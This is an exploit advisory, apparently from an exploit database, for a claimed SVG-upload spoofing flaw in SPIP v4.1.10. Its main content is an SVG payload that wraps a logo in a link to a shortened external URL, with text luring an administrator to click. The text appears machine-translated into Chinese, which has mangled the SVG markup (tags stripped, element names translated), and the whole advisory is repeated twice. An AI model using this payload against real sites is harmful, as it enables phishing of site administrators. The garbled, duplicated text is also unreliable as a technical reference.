##利用标题: SPIP v4.1.10-欺骗管理帐户
##作者: nu11secur1ty
## date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.pip.net/spip/archives/spip-v4.1.10.zip
##参考: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
## Description:
恶意用户可以上传恶意SVG文件,该文件不是
通过安全功能过滤,他可以欺骗
该系统的管理员通过点击他来检查他的徽标
和访问,也许是一个非常危险的URL。
Web应用程序网站逻辑错误,并且无法很好地消毒上传功能。
状态:高脆弱性
[+] exploit:
``SVG
SVG XMLNS='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink'版本='1.1'
defs
线性gralgradient ID='badgegradient'
停止偏移='0'/
停止偏移='1'/
/线性化
/defs
g id='heading'
a xlink:href='https://rb.gy/74f0y'
路径id='徽章'd='m 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 c
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 c
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z'//
!
10)'新/文字-
文本id='title'x='40'y='20'plase单击徽标,
在我们的网站上查看我们的设计服务,谢谢!/文字
/一个
/g
/svg
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/cve-nu11secur1ty/tree/main/main/main/vendors/spip/spip-4.1.10)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/spip-v4110-poofing-admin-account.html)
##时间花费:
00:37:00
##作者: nu11secur1ty
## date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.pip.net/spip/archives/spip-v4.1.10.zip
##参考: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
## Description:
恶意用户可以上传恶意SVG文件,该文件不是
通过安全功能过滤,他可以欺骗
该系统的管理员通过点击他来检查他的徽标
和访问,也许是一个非常危险的URL。
Web应用程序网站逻辑错误,并且无法很好地消毒上传功能。
状态:高脆弱性
[+] exploit:
``SVG
SVG XMLNS='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink'版本='1.1'
defs
线性gralgradient ID='badgegradient'
停止偏移='0'/
停止偏移='1'/
/线性化
/defs
g id='heading'
a xlink:href='https://rb.gy/74f0y'
路径id='徽章'd='m 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 c
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 c
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z'//
!
10)'新/文字-
文本id='title'x='40'y='20'plase单击徽标,
在我们的网站上查看我们的设计服务,谢谢!/文字
/一个
/g
/svg
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/cve-nu11secur1ty/tree/main/main/main/vendors/spip/spip-4.1.10)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/spip-v4110-poofing-admin-account.html)
##时间花费:
00:37:00